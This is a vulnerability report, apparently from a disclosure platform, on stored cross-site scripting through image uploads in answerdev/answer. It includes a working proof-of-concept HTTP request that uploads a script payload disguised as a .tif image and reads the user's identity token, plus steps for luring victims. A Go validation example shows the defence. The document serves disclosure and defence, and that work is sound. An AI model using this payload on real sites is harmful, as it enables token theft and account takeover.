Image upload function has stored XSS vulnerability in answerdev/answer
Reported on
Jan 12th 2023
Description
Malicious users can upload files containing malicious HTML code through this vulnerability, resulting in the theft of the identity tokens of other users or administrators who access the related pages, and in their accounts being taken over.
Proof of Concept
step1. Log in to a common user account
step2. Send the following HTTP request to upload the "image"
POST /answer/api/v1/file HTTP/1.1
Host: localhost:9080
Authorization: 5f61e241-91a4-11ed-a458-0242ac110002
Content-Type: multipart/form-data; boundary=---------------------------133113666429484033361737701471
Content-Length: 392

-----------------------------133113666429484033361737701471
Content-Disposition: form-data; name="source"

post
-----------------------------133113666429484033361737701471
Content-Disposition: form-data; name="file"; filename="mini.tif"
Content-Type: image/jpeg

<script>alert(localStorage.getItem('_a_lui_'))</script>
-----------------------------133113666429484033361737701471--
step3. Send the URL (http://localhost:9080/uploads/post/4KdbYyp9F4E.tif) to other users, or publish the URL in a question or answer to induce other users to click it. Once another user opens the URL, their identity token is stolen.
Impact
Malicious users can upload files containing malicious HTML code through this vulnerability, resulting in the theft of the identity tokens of other users or administrators who access the related pages, and in their accounts being taken over.
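As an added defensive example (not answerdev/answer's own code), the server-side check that would refuse the request in the PoC: the file's type is decided by sniffing its leading bytes with Go's http.DetectContentType, and the filename extension must agree with that sniffed type, so an HTML body declared as image/jpeg under a .tif name is rejected. The allowlist, the function name and the sample inputs are assumptions constructed for this example.

```go
package main

import (
	"fmt"
	"net/http"
	"path/filepath"
	"strings"
)

// Constructed allowlist (an assumption, not the project's configuration):
// sniffed MIME type -> extensions a file of that type may be stored under.
var allowedImageTypes = map[string][]string{
	"image/jpeg": {".jpg", ".jpeg"},
	"image/png":  {".png"},
	"image/gif":  {".gif"},
	"image/webp": {".webp"},
}

// validateImageUpload decides the file's type from its leading bytes, never from
// the client-supplied Content-Type (the PoC declares image/jpeg for an HTML body),
// and requires the extension to agree; serve the file with the returned type and
// X-Content-Type-Options: nosniff so browsers cannot reinterpret it as HTML.
func validateImageUpload(filename string, data []byte) (string, error) {
	sniffed := http.DetectContentType(data) // e.g. "text/html; charset=utf-8"
	if i := strings.Index(sniffed, ";"); i >= 0 {
		sniffed = strings.TrimSpace(sniffed[:i])
	}
	exts, ok := allowedImageTypes[sniffed]
	if !ok { // HTML, SVG, scripts, empty files and unknown binaries all end here
		return "", fmt.Errorf("content sniffed as %q, not an allowed image", sniffed)
	}
	ext := strings.ToLower(filepath.Ext(filename))
	for _, e := range exts {
		if e == ext {
			return sniffed, nil
		}
	}
	return "", fmt.Errorf("extension %q does not match content type %q", ext, sniffed)
}

func main() {
	// Constructed inputs: the report's HTML-as-image upload and a real JPEG header.
	samples := map[string][]byte{
		"mini.tif":  []byte("<script>alert(1)</script>"),
		"photo.jpg": {0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 'J', 'F', 'I', 'F', 0x00},
	}
	for name, data := range samples {
		typ, err := validateImageUpload(name, data)
		fmt.Printf("%-10s type=%q err=%v\n", name, typ, err)
	}
}
```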
Hi Team, could you help me apply for a CVE ID for this vulnerability? Thanks